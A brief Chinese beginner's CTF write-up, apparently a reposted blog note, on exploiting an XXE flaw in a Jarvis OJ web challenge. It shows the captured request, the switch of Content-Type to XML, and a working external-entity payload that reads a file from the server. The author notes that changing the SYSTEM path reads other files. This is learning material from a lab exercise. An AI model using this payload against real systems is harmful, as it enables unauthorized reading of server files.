xxe 新手学习记录
在做某题时遇到了xxe漏洞,学习+记录
这里因为环境暂时关了,现在复现不了,所以在网络上又找到了一些xxe题目环境
这里有 PikaChu靶场里的xxe环境,这个环境可以在BUUCTF里开,但是这里我们又找到了另一个环境,(不能保证环境一定稳定)
环境链接(有需要访问的注意,环境来源于网络)
介绍xxe的博客
关于这道题目,我的解题:
0x00
进入环境就发现了个按钮,那肯定是要打开burp然后点击按钮啊!
查看请求数据包
POST /api/v1.0/try HTTP/1.1
Host: web.jarvisoj.com:9882
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 36
Origin: http://web.jarvisoj.com:9882
Connection: close
Referer: http://web.jarvisoj.com:9882/
{"search":"type sth!","value":"own"}
可以看到这个Content-Type: application/json
,而我们要利用这个漏洞,就要把这个键值对改为,Content-Type: application/xml
,下面就能写xxe利用代码了,这里我只是简单地学了一下,所以我就只记录了简单的读取靶机文件的xml
のpayload
0x01
这里的利用代码,再利用时,只需要更改一部分,就是要读取的文件SYSTEM后的内容。
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "./flag.txt">
]>
<user>&xxe;</user>
在burp的repeater模块的响应头里发现了flag
读取文件不是很难,但是命令执行的话,暂时不会,找时间补一下
先鸽鸽,鸽鸽再说。 ——鸽de
此文转载于CSDN我的另一账号,便于备份